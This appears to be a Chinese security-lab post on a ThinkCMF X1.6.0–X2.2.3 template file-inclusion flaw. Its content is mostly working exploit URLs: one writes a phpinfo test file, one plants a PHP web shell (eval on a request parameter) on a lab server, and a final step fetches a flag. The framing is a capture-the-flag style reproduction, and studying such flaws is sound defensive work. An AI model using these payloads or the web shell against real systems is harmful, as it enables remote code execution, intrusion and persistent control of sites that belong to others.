【初级】thinkcmf 文件包含 x1.6.0-x2.2.3

漏洞描述:攻击者可利用此漏洞构造恶意的url,向服务器写入任意内容的文件,达到远程代码执行的目的。
影响版本:

ThinkCMF X1.6.0
ThinkCMF X2.1.0
ThinkCMF X2.2.0
ThinkCMF X2.2.1
ThinkCMF X2.2.2
ThinkCMF X2.2.3

参考资料:

POC:

?a=fetch&templateFile=public/index&prefix="&content=<php>file_put_contents('test.php','<?php phpinfo();?>')</php>
------------------------
?a=display&templateFile=README.md

漏洞复现:

  • http://123.58.224.8:61256/?a=fetch&templateFile=public/index&prefix=%22&content=%3Cphp%3Efile_put_contents(%27test.php%27,%27%3C?php%20phpinfo();?%3E%27)%3C/php%3E
图片[1]-【初级】thinkcmf 文件包含 x1.6.0-x2.2.3-NGC660 安全实验室
  • 写马
    • http://123.58.224.8:61256/?a=fetch&templateFile=public/index&prefix=%27%27&content=%3Cphp%3Efile_put_contents(%27cmd.php%27,%27%3C?php%20eval($_REQUEST[8]);%20?%3E%27)%3C/php%3E
图片[2]-【初级】thinkcmf 文件包含 x1.6.0-x2.2.3-NGC660 安全实验室
  • 获取flag
图片[3]-【初级】thinkcmf 文件包含 x1.6.0-x2.2.3-NGC660 安全实验室
© 版权声明
THE END
喜欢就支持一下吧
点赞9 分享